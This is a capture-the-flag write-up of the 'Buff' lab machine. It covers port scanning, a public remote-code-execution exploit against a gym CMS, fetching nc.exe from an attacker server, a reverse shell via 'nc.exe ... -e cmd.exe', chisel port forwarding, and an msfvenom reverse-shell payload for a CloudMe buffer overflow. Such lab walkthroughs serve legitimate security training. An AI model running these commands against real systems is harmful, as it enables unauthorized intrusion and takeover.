Buff is an easy Windows machine. You gain foothold on the machine through a CVE with a public exploit for the CMS. The PrivEsc is slightly harder as it requires you to perform port forwarding in order to be able to leverage an buffer overflow vulnerability. Who would have guessed that the machine named “Buff” would have something to do with buffer overflow :D
Now let’s get to the meat and potatoes.
Scanning for open ports shows only 8080.
nmap -sC -sV -Pn 10.10.10.198
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n’s Bro Hut
Navigating to the page on the open port on the server shows it’s a webpage related to fitness.
If you got o the “Contact” menu. You would see the following
mrb3n’s Bro Hut
Made using Gym Management Software 1.0
We can now search for the CMS and version with searchsploit or any search engine. Searchsploit finds “Unauthenticated Remote Code Execution” exploit.
Mirror the exploit.
searchsploit -m php/webapps/48506.py
Next step… LAUNCH THE EXPLOIT.
The shell from the exploit cannot use cd and etc. so we need to get a proper shell. We can transfer netcat to the victim machine.
Start http server on the attacker machine.
python -m SimpleHTTPServer 8000
Download nc.exe on the victim.
curl http://10.10.x.x:8000/nc.exe -o nc.exe
You know what follows next…
C:\xampp\htdocs\gym\upload> nc.exe 10.10.x.x 1234 -e cmd.exe
Now we have a better shell which can even use “cd” :D !
Exploring the user folders you will stumble across CloudMe_1112.exe
This is intended to lead you to the following CVE.
The thing is that the port used by CloudMe (8888) is only accessible from the localhost.
Therefore we should perform port forwarding. Awesome :D
On our attacker machine we can start a chisel server.
./chisellinux server -p 9001 — reverse
Download chisel on the victim machine and run it as a client.
.\chisel.exe client 10.10.x.x:9001 R:8888:127.0.0.1:8888
On the attacker machine you should see:
[DATE/TIME] server: session#1: tun: proxy#R:8888=>8888: Listening
That should do it for the port forwarding. We can now reach port 8888 on the victim through our own localhost.
This is why in the exploit we would leave the target as: target = “127.0.0.1”
We now can generate the MSF python payload so we can edit the payload of the exploit found on ExploitDB.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.x.x LPORT=4321 EXITFUNC=thread -b “\x00\x0d\x0a” -f python -v payload
Here is how the code looks after the edit:
Once the exploit is updated with our payload we can start a netcat listener and launch the exploit.
python 48389.py
After a little wait we get a shell on our listener. Good stuff.
We can now read the root flag.
And so the journey to OSCP continues.
